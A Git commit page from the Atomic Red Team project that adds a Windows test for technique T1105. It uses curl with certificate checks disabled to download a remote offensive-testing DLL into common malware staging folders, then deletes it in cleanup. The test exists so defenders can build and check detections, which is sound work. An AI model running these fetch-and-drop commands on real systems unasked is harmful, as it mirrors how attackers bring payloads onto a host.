security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1105 - Curl for Windows (#1653)

Browse Source 
* T1105 - Curl for Windows

* Update T1105.yaml

* ignore cleanup errors

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Michael Haag
2021-10-21 14:41:48 -06:00
committed by GitHub
parent e01633ef52
commit 5906bbec70
1 changed files with 40 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1105/T1105.yaml
+40
View File
@@ -440,3 +440,43 @@ atomic_tests:
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
cmd.exe /c "del $file_to_be_removed"
name: powershell
- name: Curl Download File
description: |
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior.
Expected output will include whether the file downloaded successfully or not.
supported_platforms:
- windows
input_arguments:
file_download:
description: File to download
type: String
default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll
curl_path:
description: path to curl.exe
type: Path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
if (Test-Path #{curl_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
Remove-Item $env:temp\curl
Remove-Item $env:temp\curl.zip
executor:
command: |
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
cleanup_command: |
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\users\public\music\allthethingsx64.dll >nul 2>&1
del c:\programdata\allthethingsx64.dll >nul 2>&1
del %Temp%\allthethingsx64.dll >nul 2>&1
name: command_prompt